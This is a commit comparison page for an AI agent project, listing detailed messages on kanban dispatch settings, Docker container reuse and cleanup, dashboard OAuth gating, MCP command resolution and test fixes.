Compare commits

..

263 Commits

Author SHA1 Message Date
Teknium 3b6347af15 feat(kanban): default_assignee fallback + per-profile concurrency cap (#27145, #21582) (#34244)
Two related dispatcher behaviors that have been missing for a while.

## kanban.default_assignee (#27145)

Reporter (@agarzon): dashboard creates a task without an assignee, task
parks in 'ready' forever even though the operator's intent ('default')
is perfectly clear. The dispatcher already had a 'skipped_unassigned'
bucket but no fallback routing — users had to manually type 'default'
in the assignee field every time.

Behavior: when 'kanban.default_assignee' is set in config.yaml, the
dispatcher applies that assignee to any unassigned ready task before
deciding whether to spawn. The row is mutated (assignee column + an
'assigned' event with source='kanban.default_assignee' for the audit
trail). Empty/whitespace config value = no fallback, preserving the
existing skipped_unassigned behavior.

Dry-run mode reports what WOULD happen via the new
'auto_assigned_default' bucket on DispatchResult, but does NOT mutate
the DB — operators using 'hermes kanban dispatch --dry-run' see the
routing decision before committing.

## kanban.max_in_progress_per_profile (#21582)

Reporter (@edwardchenchen, @simlu, 4 reactions): fan-out workloads
saturate one profile's local model / API quota / browser pool while
other profiles sit idle. The existing global 'max_in_progress' caps
total workers but doesn't balance across profiles.

Behavior: when 'kanban.max_in_progress_per_profile' is set to a
positive int, the dispatcher tracks per-assignee running counts (one
query at tick start) and refuses to spawn for any assignee already at
the cap. Tasks blocked this way go to a new
'skipped_per_profile_capped' bucket on DispatchResult as
(task_id, assignee, current_running_count) tuples — NOT an
operator-actionable failure, just 'try again next tick when the
profile has capacity'.

Pre-existing 'running' tasks count against the cap (verified via
regression test). The cap respects dry_run mode by incrementing
its in-memory counter on each would-be spawn so dry_run reports
the same balanced subset that a real tick would.

Invalid cap values (0, negative, non-int, None) are treated as 'no
cap', preserving the existing behavior. Backward-compatible for
installs that don't set the config.

## Surfaces

- 'hermes kanban dispatch' CLI now prints 'Auto-assigned to
  kanban.default_assignee=X: ...' and 'Deferred (X at per-profile cap,
  N running): ...' lines, plus matching JSON keys in --json output.
- Gateway dispatcher logs the configured values at startup
  ('default_assignee=X', 'max_in_progress_per_profile=N').
- 'kanban.max_in_progress_per_profile' added to DEFAULT_CONFIG with
  inline docs.

## Validation

- tests/hermes_cli/test_kanban_default_assignee.py (6 cases): no-cap
  baseline, auto-assign + DB mutation, dry-run reports without
  mutating, whitespace treated as None, explicit assignees untouched,
  DispatchResult field schema.
- tests/hermes_cli/test_kanban_per_profile_cap.py (9 cases including
  4 parametrized): no-cap baseline, balanced 2-profile fan-out,
  pre-existing running counts against cap, invalid cap values
  (0/-1/'abc'/None), capped tasks dispatched on next tick after
  running task completes, DispatchResult field schema.
- Broader kanban suite: 464/464 pass (was 449 baseline; +15 new
  regression tests across both features).

## Credit

#27145 — Jimmy Johansson reported the dispatcher skipped-unassigned
gap; @agarzon scoped the simpler 'honor kanban.default_assignee' fix
that matches the existing config knob.
#21582 — @edwardchenchen filed the per-profile cap ask after hitting
model 429s on fan-out research projects; @simlu confirmed the same
pain on local-model setups.
2026-05-28 19:02:55 -07:00
Ben 42612aa350 docs(docker): refresh user-guide page for s6-overlay reality
The page was last meaningfully rewritten in the pre-s6 (tini) era and had
drifted on five points that no longer matched the image:

1. "Running the dashboard" claimed the entrypoint backgrounds
   `hermes dashboard` and prefixes its output with `[dashboard]`. That
   was the pre-s6 entrypoint.sh path; under s6 the dashboard is a
   supervised s6-rc service (`docker/s6-rc.d/dashboard/run`) with no
   sed-prefix pipeline. Rewrote the section accordingly.

2. The default for `HERMES_DASHBOARD_HOST` was documented as
   `127.0.0.1`. The s6 run script defaults it to `0.0.0.0`
   (`dash_host="${HERMES_DASHBOARD_HOST:-0.0.0.0}"`). Fixed the table
   and the surrounding prose.

3. Multi-profile was documented as "not recommended in Docker — run
   one container per profile." That advice was load-bearing when
   there was no in-container supervisor, but the s6 architecture
   explicitly adds per-profile gateway supervision: each profile
   created via `hermes profile create <name>` gets a slot under
   `/run/service/gateway-<name>/`, the `02-reconcile-profiles`
   cont-init script restores them across `docker restart` from
   `gateway_state.json`, and `hermes gateway start/stop/restart` is
   intercepted by `_dispatch_via_service_manager_if_s6` to route
   through `s6-svc`. Pivoted the section to "one container, many
   supervised profile gateways" as the default, with a comparison
   table and a "When you DO want a separate container" escape
   hatch for the genuine resource-isolation / network-segmentation
   cases.

4. The Compose example trailer also claimed `[dashboard]` log
   prefixing. Replaced with the actual log routing.

5. Added a new "Where the logs go" section covering all four log
   surfaces: per-profile gateways (tee'd to `docker logs` AND
   `${HERMES_HOME}/logs/gateways/<profile>/current` since PR
   b34532319), dashboard (`docker logs`, no prefix), boot reconciler
   (`container-boot.log`), and `hermes logs`. The gateway-mode and
   Compose sections cross-reference this rather than each carrying
   their own routing prose.

Added a new "docker exec automatically drops to the hermes user"
subsection under "What the Dockerfile does", next to the existing
Privilege model warning. Documents the `/opt/hermes/bin/hermes` shim
(landed via the docker-exec privilege-drop work) — operators don't
need to remember `--user hermes` for `docker exec hermes login`,
`docker exec hermes profile create …`, etc. The historical footgun
(`auth.json` written as `root:root`, supervised gateway then can't
read its own auth file) is mentioned only as context for what the
fail-loud `exit 126` is protecting against, not as a problem the
reader needs to solve. The `HERMES_DOCKER_EXEC_AS_ROOT=1` opt-out is
documented for diagnostic sessions.

The "Permission denied" troubleshooting subsection now carries a
single-line pointer to the new section instead of duplicating it.

The `--insecure` framing reflects PR #fb5125362 (opt-in via
`HERMES_DASHBOARD_INSECURE`, not derived from bind host): the OAuth
gate is the authority, the bind host alone never implies
`--insecure`, and opting out is an explicit security trade-off.

Anchors verified resolve. i18n zh-Hans mirror left for the
translation flow to catch up.
2026-05-29 11:55:01 +10:00
Ben 3c6e70aef1 docs(docker): document new persist-across-processes contract and orphan reaper (#20561)
Updates the Docker Backend section of the user-guide configuration page
to match the actual behavior shipped in PR #33645. Pre-PR the docs
claimed "container is stopped and removed on shutdown," which was
never quite true for the documented happy path and is now actively
wrong: in default mode the container survives across Hermes processes
so background processes (npm watchers, dev servers, long-running
pytest) carry over the way the "ONE long-lived container shared
across sessions" promise requires.

Changes to `website/docs/user-guide/configuration.md`:

* Reworked the intro paragraph at the top of the Docker Backend
  section to describe the actual cross-process reuse contract.
* Expanded the YAML example with the new keys
  `docker_persist_across_processes` and `docker_orphan_reaper`, plus
  the pre-existing-but-undocumented `docker_env`, `timeout`, and
  `lifetime_seconds`.  Clarified the `container_persistent` comment
  to disambiguate from `docker_persist_across_processes`.
* Added a `docker_env` vs `docker_forward_env` explainer (one
  injects literal KEY=value, the other forwards values from the
  host/.env — easy to confuse).
* Replaced the one-line "Container lifecycle" paragraph with a full
  subsection covering:
    - the three labels Hermes tags every container with
      (hermes-agent, hermes-task-id, hermes-profile)
    - the label-probe reuse mechanism on startup
    - a teardown-trigger table with four rows for every situation
      that destroys the container in default mode
    - edge cases (OOM kill, profile switching)
* Added an "Environment variable overrides" table covering all
  TERMINAL_* env vars relevant to the Docker backend, including the
  previously-undocumented `TERMINAL_DOCKER_ENV` and
  `HERMES_DOCKER_BINARY`.

Changes to `website/docs/user-guide/docker.md`:

* Extended the cross-link admonition (around l.227) so the
  Hermes-in-Docker page points at the new terminal-backend keys
  (`docker_env`, `docker_persist_across_processes`,
  `docker_orphan_reaper`) alongside the ones already mentioned.

No code changes.  Behavior already covered by tests added in earlier
commits on this branch (#33645 commits 1-5).

Refs #20561
2026-05-29 11:49:54 +10:00
Ben 2f0f03c40d fix(docker): cleanup_vm() default honors persist mode (don't kill container on session close)
Commit 4 made cleanup_vm() default to force_remove=True, which was wrong:
cleanup_vm() is called from AIAgent.close() (TUI session close at
tui_gateway/server.py:2991, gateway session teardown at gateway/run.py:3569)
and from per-turn cleanup (agent/chat_completion_helpers.py:1517). All
three are session-lifecycle events that should honor persist mode, not
explicit user-initiated teardown.

Ben reported the symptom: container shared between multiple TUI sessions
(good) but killed as soon as any session closed (bad). With force_remove=True
as the default, every `session.close` JSON-RPC tore down the container.

The fix is to flip cleanup_vm()'s force_remove default back to False.
The kwarg still exists for future explicit-teardown paths (`/reset`-style
flows, "destroy my sandbox" commands) that haven't been wired up yet.

Two new unit tests pin the behavior:

* `test_cleanup_vm_default_honors_persist_mode` — asserts
  `cleanup_vm(task_id)` does neither docker stop nor docker rm on a
  persist-mode container (the regression Ben caught).
* `test_cleanup_vm_force_remove_tears_down_persist_container` —
  asserts the kwarg still flows through the runtime-signature-inspection
  plumbing to the backend's cleanup().

E2E verified against real Docker (in addition to all 17 existing checks):

  ✓ Default cleanup_vm() leaves persist-mode container running
  ✓ cleanup_vm(force_remove=True) removed the container

Refs #20561
2026-05-29 11:49:54 +10:00
Ben 5c2170a7c6 fix(docker): persist-mode cleanup is no-op; add force_remove kwarg (#20561)
The first iteration of this PR did docker stop on every cleanup in
persist mode (only skipping docker rm). Ben caught this as
contradicting the documented "ONE long-lived container shared across
sessions" semantics: stopping the container on every Hermes /quit kills
any background processes inside (npm watchers, pytest watchers,
long-running scripts) — exactly the case persist mode is supposed to
protect.

This commit splits the cleanup paths cleanly:

* **Persist mode (default)** — cleanup() is a NO-OP for the
  container. Container stays running, processes survive, next Hermes
  process attaches via the existing label probe in ~ms instead of
  waiting for docker start. Resource reclamation happens via the
  orphan reaper at next startup (2 × lifetime_seconds threshold), which
  covers the SIGKILL / OOM / abandoned-laptop cases.
* **Opt-out mode (persist_across_processes=False)** — unchanged:
  docker stop + docker rm -f on cleanup as before.
* **Explicit teardown** — new cleanup(force_remove=True) kwarg
  overrides persist mode and tears the container down unconditionally.
  cleanup_vm(task_id) now defaults to force_remove=True since
  it's the user-driven reset path (called from AIAgent.close(),
  /reset-style flows, and the idle reaper's per-turn cleanup).

The idle reaper in _cleanup_inactive_envs calls env.cleanup()
directly with no kwargs, so idle persist-mode envs are no-op'd — the
container survives the in-process pop and the next tool call re-probes
via labels. No state leak: _container_id is still cleared on the
in-process handle.

E2E verified against real Docker:

  ✓ Container is still running after cleanup()
  ✓ Background process (sleep loop) survived cleanup()
  ✓ Filesystem state preserved across cleanup()
  ✓ In-process container_id cleared (next __init__ will re-probe)
  ✓ Background process visible from reused env (no docker start happened)
  ✓ force_remove=True removed the container even in persist mode
  ✓ cleanup_vm() removed the container (defaults to force_remove=True)

Test changes:

* Replaces `test_cleanup_with_persist_only_stops_no_rm` with
  `test_cleanup_with_persist_is_noop_for_container` — asserts neither
  stop nor rm runs in persist mode, and the in-process handle is
  cleared so re-probe works.
* Adds `test_cleanup_force_remove_stops_and_rms_even_in_persist_mode`
  — covers the new kwarg.
* Updates `test_cleanup_uses_subprocess_run_not_detached_shell` and
  `test_wait_for_cleanup_after_cleanup_returns_true` to pass
  `force_remove=True` so they actually exercise the docker code path
  (default no-op would trivially pass).

cleanup_vm() forwards `force_remove` only to backends whose cleanup()
accepts the kwarg (currently just DockerEnvironment) via runtime
signature inspection — Modal/Daytona/SSH `cleanup()` signatures are
unchanged.

Refs #20561
2026-05-29 11:49:54 +10:00
Ben d77d877665 fix(docker): startup orphan reaper for crashed-process containers
The cleanup-fix in the previous commit handles the graceful-exit leak: a
Hermes process that runs ``atexit`` will now actually wait on the docker
stop/rm worker thread, so containers either survive (persist mode) or are
fully removed (opt-out mode) by the time the interpreter exits.

But ``atexit`` doesn't fire on SIGKILL, OOM-kill, or terminal-window
close. Containers from those exits stay parked with no surviving Python
process to reuse or remove them, so they accumulate until the operator
intervenes with ``docker rm -f``. The cleanup-fix doesn't help this class
— there's no live cleanup() to fix.

This commit adds the safety net: a startup orphan reaper that runs once
per Hermes process and removes long-Exited hermes-labeled containers
that the prior commit couldn't reach.

Implementation:

* New ``reap_orphan_containers()`` in ``tools/environments/docker.py``.
  Filters: ``label=hermes-agent=1`` + ``status=exited`` + (optional)
  ``label=hermes-profile=<current>``. Per-container ``docker inspect``
  parses ``State.FinishedAt`` (with nanosecond-precision trimming for
  Python's microsecond-bound ``fromisoformat``); containers older than
  the threshold get ``docker rm -f``'d. The ``status=exited`` filter is
  load-bearing — a running container may belong to a sibling Hermes
  process whose reuse path will pick it up; killing it would crash the
  sibling mid-command. Single-container failures are logged and the
  sweep continues to the next candidate.

* New ``_maybe_reap_docker_orphans()`` helper in
  ``tools/terminal_tool.py``. Wired into ``_create_environment()`` for
  ``env_type == "docker"``. Gated by:

    - ``terminal.docker_orphan_reaper: true`` (default; opt-out for
      operators running multiple Hermes processes in the same profile
      who don't trust the conservative defaults)
    - ``_docker_orphan_reaper_ran`` module flag with double-checked
      locking — parallel subagents and RL rollouts don't trigger N
      concurrent docker ps storms
    - Age threshold = ``2 × TERMINAL_LIFETIME_SECONDS`` with a 60s floor
      (so ``TERMINAL_LIFETIME_SECONDS=0`` doesn't race the user's own
      setup)
    - Profile scoping — a research profile NEVER reaps the default
      profile's stragglers
    - Exception swallow — a janitor failure must never block container
      creation

* New config ``terminal.docker_orphan_reaper`` wired through all four
  config-bridge sites (cli.py, gateway/run.py, hermes_cli/config.py,
  tests/conftest.py) and pinned by
  ``test_docker_orphan_reaper_is_bridged_everywhere``.

Coverage:

* 9 new unit tests in test_docker_environment.py — happy path, recent-
  container sparing, profile scoping, unparseable-timestamp safety,
  docker-ps-failure handling, partial-failure continuation, nanosecond
  timestamp parsing, zero-value FinishedAt rejection.
* 6 new integration tests in test_docker_orphan_reaper_integration.py
  — once-per-process gate, disable-flag respected, lifetime doubling
  with 60s floor, current-profile filter wiring, exception swallow.
* 1 new bridge-invariant regression test.

Closes #20561 (combined with the two prior commits on this branch).
2026-05-29 11:49:54 +10:00
Ben ac8e238bc8 fix(docker): reuse containers across processes + fix cleanup leaks
The Docker backend docs claim "Single persistent container — ONE long-
lived container shared across sessions, /new, /reset, and delegate_task
subagents. Stopped/removed on shutdown." In practice the code only
honored that contract within a single Python process via the in-memory
\`_active_environments[task_id]\` cache. Every \`hermes chat\` invocation
spawned a fresh \`hermes-<hex>\` container; older containers piled up in
\`Exited\` state and accumulated until manual \`docker rm\` (issue #20561).

Three root causes, all addressed by this commit:

1. No cross-process container discovery.
2. \`cleanup()\` used fire-and-forget \`subprocess.Popen("... &", shell=True)\`
   which raced with parent-process exit — when Python exited promptly the
   detached shell child got killed mid-\`docker stop\`, leaving stopped
   containers behind.
3. The \`docker rm\` step in cleanup was gated on \`not self._persistent\`
   (the bind-mount-persistence flag). Default config sets
   \`container_persistent: true\`, so the default happy path skipped \`rm\`
   entirely — even when the user explicitly didn't want cross-process
   reuse, containers leaked.

Fix:

* Add \`DockerEnvironment.__init__(persist_across_processes=True)\`. When
  true, init probes
  \`docker ps -a --filter label=hermes-agent=1
                  --filter label=hermes-task-id=<task>
                  --filter label=hermes-profile=<profile>\`
  and reuses a matching container (running → attach; stopped →
  \`docker start\` → attach; \`docker start\` failure → fall through to a
  fresh \`docker run\`). Multiple matches prefer the running one, with the
  stragglers left for the orphan reaper (next commit) to clean up.

* Rewrite \`cleanup()\`. Uses \`subprocess.run(..., timeout=30)\` on a
  daemon \`threading.Thread\`, not the racy \`Popen(... &)\`. The
  \`_persistent\` guard is dropped on the \`rm\` step — \`rm\` now runs
  whenever \`persist_across_processes\` is false, regardless of the
  bind-mount-persistence setting. The leak class is gone in all
  combinations.

* Add \`wait_for_cleanup(timeout)\`. \`tools/terminal_tool.py\`'s atexit
  hook calls this on every active env, blocking up to 15s for the
  cleanup thread before interpreter exit. Without this, \`hermes /quit\`
  raced the daemon-thread teardown and dropped the stop/rm work.

* New config \`terminal.docker_persist_across_processes\` (default
  \`true\` — restores the documented contract). Set \`false\` for hard
  per-process isolation. Wired through all four config-bridge sites
  (cli.py env_mappings, gateway/run.py _terminal_env_map,
  hermes_cli/config.py _config_to_env_sync, tests/conftest.py env-strip
  list); regression-pinned by
  \`test_docker_persist_across_processes_is_bridged_everywhere\` matching
  the existing pattern for docker_run_as_host_user / docker_env.

Reuse intentionally does NOT compare image / mounts / resources — only
the labels. Operators changing those settings should set
\`docker_persist_across_processes: false\` (or \`docker rm -f\` the
labeled container) to force a fresh start. This keeps the probe cheap
and the failure mode obvious.

Coverage: 12 new unit tests in tests/tools/test_docker_environment.py
covering reuse paths (running, stopped, fallback, opt-out, duplicate
preference) and cleanup behavior (persist-mode no-rm, opt-out always-rm,
no-Popen, wait_for_cleanup semantics, partial-init safety). Plus one
config-bridge regression pin.

Refs #20561
2026-05-29 11:49:54 +10:00
Ben 8d129d013b fix(docker): tag containers with hermes-agent labels for identification
Issue #20561 (Docker containers accumulate) needs a way to identify
hermes-created containers from the outside — both for the orphan reaper
(a follow-up commit) and for operators triaging `docker ps -a | grep
hermes-` after a SIGKILL leaves stragglers. The previous `hermes-<hex>`
name prefix was the only signal, which broke down under cross-process
reuse (planned) and against any custom `--name` someone might pass via
`docker_extra_args`.

This commit adds three labels at `docker run` time:

  --label hermes-agent=1                # global sweep target
  --label hermes-task-id=<sanitized>    # per-task reuse key
  --label hermes-profile=<sanitized>    # per-profile isolation key

Values are sanitized to `[A-Za-z0-9_.-]` and truncated to 63 chars so the
label round-trips cleanly through `docker ps --filter label=key=value`.
Empty or non-string inputs collapse to "unknown" rather than producing
an unqueryable empty value.

No behavior change: the labels are pure metadata. The follow-up commits
in this PR (cleanup-fix + orphan reaper) are what use them.

Refs #20561
2026-05-29 11:49:54 +10:00
Teknium 300140e006 test(tui_gateway): stop reloading server module in fixture teardown (#34217)
tui_gateway.server registers two atexit hooks at module load time:
ThreadPoolExecutor shutdown (line 170) and _shutdown_sessions (line 336).
Three test files reloaded the module on each fixture teardown to reset
per-test state. Each reload re-runs module-level code, including the
atexit registrations — duplicates accumulate across the test session.

At pytest interpreter shutdown the duplicated atexit hooks race the
stderr buffer flush:

    Fatal Python error: _enter_buffered_busy: could not acquire lock
    for <_io.BufferedWriter name='<stderr>'> at interpreter shutdown,
    possibly due to daemon threads

pytest reports 'tests passed but the slice exited non-zero', and the
shard turns red on CI. Surfaced today on PR #34193's test slice 1
(204 files, 3572 tests passed, then Fatal Python error during exit).

Fix: drop importlib.reload(mod) from the three fixtures that have it.
Per-test reset is handled by clearing the mutable session dicts
(_sessions, _pending, _answers). _methods is also no longer cleared —
it's populated at module import time and would only be re-populated by
a reload, so clearing it without reload broke session.resume /
command.dispatch / slash.exec method registration across tests.

Affected fixtures:
- tests/tui_gateway/test_goal_command.py
- tests/tui_gateway/test_protocol.py
- tests/tui_gateway/test_review_summary_callback.py

The second reload in test_protocol.py at line 211 (reload of
tui_gateway.transport) is preserved — transport.py has no atexit hooks
or threads, so reload is safe there.

Tests: 84/84 in tests/tui_gateway/ pass cleanly with exit code 0; no
Fatal Python error at interpreter shutdown.
2026-05-28 18:16:54 -07:00
Teknium e71a2bd11b chore: release v0.15.1 (2026.5.29) (#34222) 2026-05-28 18:11:49 -07:00
Teknium 769ee86cd2 feat(kanban): attach images referenced in task bodies to worker vision (#34210)
Kanban workers now scan the task body for local image paths and
http(s) image URLs and attach them to the worker's first user turn —
matching the CLI/gateway behaviour for inbound images. Before, a
user pasting `/home/me/screenshot.png` or `https://example.com/img.png`
into a kanban task description had it sent to the model as plain
text and the pixels were never seen.

How it works:
* agent/image_routing.py gains extract_image_refs(text) → (paths, urls)
  that mirrors gateway/platforms/base.py:extract_local_files (absolute /
  ~-relative paths, image extensions only, ignores fenced/inline code).
* build_native_content_parts() accepts an optional image_urls= kwarg
  and emits passthrough image_url parts for remote URLs alongside the
  base64 data: URLs used for local paths.
* cli.py (single-query/quiet branch — the path every dispatcher-spawned
  worker takes) detects HERMES_KANBAN_TASK, reads the task body via
  kanban_db.get_task, runs extract_image_refs, and threads the results
  into the existing image-routing decision (native vs text). Best-effort:
  enrichment failures never block worker startup.

Tested:
* tests/agent/test_image_routing.py — 22 new tests for extract_image_refs
  and URL pass-through in build_native_content_parts.
* tests/hermes_cli/test_kanban_worker_image_extraction.py — 10 new tests
  driving real kanban_db round-trip (create task → read body → extract
  refs → build parts).
* E2E: created a fake kanban task with a body referencing both a local
  PNG and an https URL; verified the worker pipeline produces a
  multimodal user turn with 1 text part + 2 image_url parts (data URL
  for the local file, passthrough URL for the remote).
2026-05-28 17:50:42 -07:00
Ben 1b1e30510a test(docker): repair dashboard tests broken by the insecure-opt-in fix
The Docker integration test job started failing on main after
fb5125362 ("docker: opt in to dashboard --insecure via env var").
Two distinct failures, both fallout from that change being more
behaviour-changing than the existing test harness anticipated.

Failure 1 — test_dashboard_port_override (silent regression in an
already-existing test)
The test starts the container with just HERMES_DASHBOARD=1, defaults
to host=0.0.0.0, no HERMES_DASHBOARD_OAUTH_CLIENT_ID, no
HERMES_DASHBOARD_INSECURE. Pre-fix that combination got --insecure
auto-injected by the s6 run script (anything non-loopback was
implicitly insecure), so the OAuth gate stayed off and start_server
bound the port. Post-fix the gate engages, no provider is
registered, and start_server raises SystemExit before binding —
under s6 the dashboard goes into a restart loop and the test's
/proc/net/tcp poll finds nothing.

Same silent regression was masking three sibling tests
(test_dashboard_slot_reports_up_when_enabled, test_dashboard_opt_in_starts,
test_dashboard_restarts_after_crash) — they all only sample pgrep
or s6-svstat and so caught the supervised process mid-restart
loop, appearing to pass while the dashboard was actually never
reaching a healthy state.

Fix: pin HERMES_DASHBOARD_INSECURE=1 on every test that enables
the dashboard but doesn't itself exercise the auth gate. Each
pinned site carries an inline comment pointing back to
test_dashboard_slot_reports_up_when_enabled for the full
rationale.

Failure 2 — test_dashboard_oauth_gate_engages_on_non_loopback_bind
(bug in the test I added in fb5125362)
The probe used urllib.request.urlopen() against /api/status. Under
the now-engaged OAuth gate /api/status no longer answers
unauthenticated callers (the gate middleware runs upstream of the
legacy _SESSION_TOKEN allowlist and 401s anything without a valid
session cookie). urlopen() raises HTTPError on the 401, the wrapper
treated that as "not ready yet", and the poll loop hit
timeout.

Fix: split the probe into a generic _http_probe() helper that
returns (status_code, body) for any HTTP response — including 401,
which IS the gate-engaged success signal. The helper feeds a
multi-line Python program over stdin via a POSIX heredoc so the
try/except branch reads naturally; far less fragile than the
earlier semicolon-laden -c one-liner.

The OAuth-gate test now verifies two independent observable
consequences of the gate being on:

  1. GET /api/auth/providers (publicly reachable through the gate
     so the login page can bootstrap) returns 200 with `nous` in
     the provider list — proves the bundled provider registered.
  2. GET /api/status returns 401 — proves the OAuth gate runs
     upstream of the legacy public-paths allowlist and is
     actively intercepting unauthenticated callers.

The insecure-opt-out test still hits /api/status, but now
asserts status_code == 200 first (proves the gate is bypassed)
before parsing the JSON for auth_required: false (proves the
gate-state flag is also correctly off).

Verified locally end-to-end against a fresh image build on a
real Docker daemon: all 41 tests under tests/docker/ pass in
2m38s, including the two formerly-failing dashboard tests and
the three sibling tests that were passing by accident.
2026-05-29 10:30:52 +10:00
Teknium f3acdd94fe Merge pull request #30698 from NousResearch/refactor/use-ds-primitives
refactor(web): consume DS primitives, remove local component copies
2026-05-28 17:29:28 -07:00
Teknium 78a54d2c00 fix(skills-page): source pills and category sidebar collapsed to All only (#34194)
Regression from PR #33809 (lazy-fetch refactor). The `sources` and
`categoryEntries` useMemo blocks were derived from `allSkillsLocal`
but had empty/incomplete deps arrays — so they computed once at mount
when the catalog was still `[]`, then never recomputed when the fetch
resolved.

Symptom: live site shows only the "All 87,639" source button and
"All Skills 87,639" category — no per-source pills (ClawHub, skills.sh,
LobeHub, etc.) and no category breakdown. Filtering by source/category
is unusable.

Fix: add `allSkillsLocal` to both deps arrays so they recompute when
data arrives. Local build green on en + zh-Hans.
2026-05-28 17:11:40 -07:00
Ben e7c99651fb fix(mcp): resolve bare npx/npm/node against /usr/local/bin
When the Hermes Docker image runs an stdio MCP server configured with an
explicit env.PATH that omits /usr/local/bin (a common pattern when users
hand-author PATH for sandboxing), the MCP env-filter passes that narrow
PATH straight through to the subprocess. _resolve_stdio_command's
fallback for bare 'npx' / 'npm' / 'node' commands only checked
$HERMES_HOME/node/bin/ and ~/.local/bin/, so execvp() failed with
'[Errno 2] No such file or directory: npx' on every Node-based stdio
MCP server (Railway, Anthropic, GitHub Copilot, etc.).

The naive workaround — symlink /usr/local/bin/npx into the user's PATH —
fails one layer deeper because npx's shebang re-execs /usr/bin/env node
and node also lives at /usr/local/bin/node.

Fix: add /usr/local/bin/<cmd> as a third candidate in the fallback list.
This is the canonical install location for Node on:
  - Linux from-source builds
  - the upstream node:bookworm-slim image, which the Hermes Docker
    image copies node + npm + corepack from since #4977 (the Node 22 LTS
    refactor that exposed this)
  - macOS Homebrew on Intel

Because the resolver already calls _prepend_path(resolved_env, command_dir)
after locating the command, /usr/local/bin gets prepended to the env's
PATH automatically, which also fixes the second-layer shebang failure
(npx-cli.js can now find node).

Scope is intentionally narrow: the fix activates only when the bare
command isn't otherwise locatable through the user's PATH. Users who
explicitly narrowed PATH for a non-Node MCP server see no change in
behavior.

Tested:
  - tests/tools/test_mcp_tool_issue_948.py: new test
    test_resolve_stdio_command_falls_back_to_usr_local_bin (mirrors the
    existing hermes-node-bin fallback test)
  - Full MCP test suite: 254/254 pass across 7 test files
  - E2E against a freshly-built Docker image: reproduced the original
    failure mode (env.PATH=/opt/data/bin:/usr/bin:/bin), confirmed the
    resolver returns /usr/local/bin/npx and prepends /usr/local/bin to
    PATH; subprocess.run of the resolved command prints '10.9.8' and
    exits 0 with empty stderr
  - Negative E2E on the host (where Node is already on PATH via mise):
    resolver still hits the mise install dir, /usr/local/bin candidate
    is not consulted, PATH is unchanged
2026-05-29 10:05:42 +10:00
Ben fb51253620 docker: opt in to dashboard --insecure via env var, never derive from bind host
The s6 dashboard run script flipped `--insecure` on whenever
`HERMES_DASHBOARD_HOST` was anything other than 127.0.0.1 / localhost.
That comment ("the dashboard refuses otherwise") predates the OAuth
auth gate: back when it was written, `start_server` would SystemExit
on any non-loopback bind, so the run script's `--insecure` was the
only way to make in-container deployments work at all.

The gate has since been replaced by `should_require_auth(host,
allow_public)`, which engages the OAuth flow when a
`DashboardAuthProvider` is registered (the bundled `dashboard_auth/nous`
provider auto-registers on `HERMES_DASHBOARD_OAUTH_CLIENT_ID`) and
fails closed with a specific operator-facing error when none is. The
host-derived `--insecure` ran upstream of all that and silently
disabled the gate on every container-deployed dashboard.

Most visible under the portal's wildcard-subdomain rollout: every Fly
machine binds 0.0.0.0 so the edge can reach Flycast, every machine
boots with the correct `HERMES_DASHBOARD_OAUTH_CLIENT_ID`, the nous
provider registers — and `/api/status` still returns
`{"auth_required": false, "auth_providers": ["nous"]}` because the
run script disabled the gate before `start_server` ever saw the
request. The dashboard SPA was served to anyone, no `/login` redirect,
no OAuth challenge.

Fix: derive `--insecure` from an explicit opt-in env var,
`HERMES_DASHBOARD_INSECURE` (truthy values matching the rest of the
s6 boolean envs: 1, true, TRUE, True, yes, YES, Yes). Operators on
trusted LANs behind a reverse proxy without the OAuth contract
(the existing `docker-compose.windows.yml` use case) opt in
explicitly; portal-managed agent deployments leave it unset and let
the gate engage.

`docker-compose.windows.yml` already passes `--insecure` on the
`command:` array directly (line 38), so it doesn't depend on the s6
auto-injection. No compose-file change required.

Tests:
* `tests/test_docker_home_override_scripts.py` — extends the existing
  static-text guard with a regression assertion that the legacy
  host-derived case-statement is gone and the new env-var opt-in is
  present (locks against accidental revert).
* `tests/docker/test_dashboard.py` — adds two Docker-in-Docker tests
  exercising the actual `/api/status` round-trip:
  - 0.0.0.0 bind + `HERMES_DASHBOARD_OAUTH_CLIENT_ID` → gate engaged
  - 0.0.0.0 bind + `HERMES_DASHBOARD_INSECURE=1` → gate disabled

Docs:
* `website/docs/user-guide/docker.md` + zh-Hans i18n — adds the new
  env var to the table, replaces the stale prose ("the entrypoint
  no longer auto-enables insecure mode" — which until this PR was
  flat-out wrong) with an accurate description of the gate's
  trigger conditions and the explicit opt-out.

shellcheck clean. Python static-text test passes locally. Behavioural
test will run against any future image build (CI's Docker harness).
2026-05-29 09:56:40 +10:00
Evo ef009a987a docs(reference): document --no-supervise / HERMES_GATEWAY_NO_SUPERVISE from #33583 (#33751)
* docs(reference): document --no-supervise / HERMES_GATEWAY_NO_SUPERVISE (en)

* docs(reference): document --no-supervise / HERMES_GATEWAY_NO_SUPERVISE (en)

* docs(reference): document --no-supervise / HERMES_GATEWAY_NO_SUPERVISE (zh)

* docs(reference): document --no-supervise / HERMES_GATEWAY_NO_SUPERVISE (zh)
2026-05-29 09:44:53 +10:00
BROCCOLO1D 130396c658 ci(docker): avoid gha cache on arm64 PR builds 2026-05-29 09:43:48 +10:00
Austin Pickett a5c1f925b5 fix(web): stop /api/auth/me 401 from triggering a reload loop
In loopback mode the dashboard's identity probe (/api/auth/me) returns
401 by design — AuthWidget swallows it and renders nothing. But the
probe routed through fetchJSON, whose loopback 401 handler treats a 401
as a rotated session token and full-page-reloads to pick up a fresh one.
That reload is guarded by a one-shot sessionStorage flag which every
*successful* request clears, so with auth/me reliably 401ing and the
other dashboard calls (status/config/sessions) reliably succeeding, the
guard never sticks and the page reload-loops indefinitely (the "boot
flash").

Add an allowUnauthorized option to fetchJSON that skips only the loopback
stale-token reload (the 401 still throws so AuthWidget can catch it, and
the gated-mode login_url envelope redirect is unaffected), and use it for
getAuthMe.

Co-authored-by: Cursor <cursoragent@cursor.com>
2026-05-28 16:58:42 -04:00
kshitij 11d93096b3 Merge pull request #34097 from kshitijk4poor/salvage/memori-trace-messages
feat: expose completed-turn message context to memory providers (salvage #28065)
2026-05-28 13:56:07 -07:00
kshitijk4poor d464d08a5f chore: add devwdave to AUTHOR_MAP
Maps both commit emails (david@memorilabs.ai, dave@devwdave.com) used on
#28065 to the devwdave GitHub account so the contributor audit in
scripts/release.py passes.
2026-05-29 02:16:43 +05:30
Dave Heritage 5a95fb2e14 feat: expose completed-turn message context to memory providers
Adds an optional `messages` keyword to the `MemoryProvider.sync_turn`
contract so external/community memory plugins can receive the OpenAI-style
conversation message list for the completed turn — including assistant tool
calls and tool result content — not just the final assistant text.

